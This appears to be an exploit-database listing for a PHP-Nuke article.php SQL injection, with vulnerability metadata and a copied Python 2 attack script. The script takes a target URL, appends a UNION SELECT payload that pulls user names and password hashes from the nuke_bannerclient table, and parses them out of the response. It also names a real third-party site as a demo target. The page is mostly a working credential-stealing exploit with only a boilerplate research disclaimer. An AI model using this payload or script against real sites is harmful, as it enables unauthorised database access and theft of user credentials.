Advertisement






PHP-Nuke article.php SQL Injection

CVE Category Price Severity
N/A CWE-89 Varies High
Author Risk Exploitation Type Date
Anonymous High Remote 2011-08-18
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2011080096

Below is a copy:

# Coded By : darkTR - CodeHunters
#http://www.1337day.com/exploits/16550
#Demo : http://www.moravanszky.com/article.php?sid=24
#Site adresini akl ksm olarak girin www.site.com/article.php?sid=24 þeklinde

import re, time, urllib2

hedef = raw_input("Site adiniz giriniz:")

sorgu = "+union+select+1,2,3,4,5,concat(0x3a3a3a,name,0x3a3a3a,passwd,0x3a3a3a),7,8,9+from+nuke_bannerclient"

okunacak_adres = hedef+sorgu

okunan = urllib2.urlopen(okunacak_adres).read()

arama = re.search("(.*):::(.*:::.*):::(.*)",okunan)

if arama:
    son = arama.group(2)
    user = son.split(":::")[0]
    password = son.split(":::")[1]


print "user:" + user
print "password" + password


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum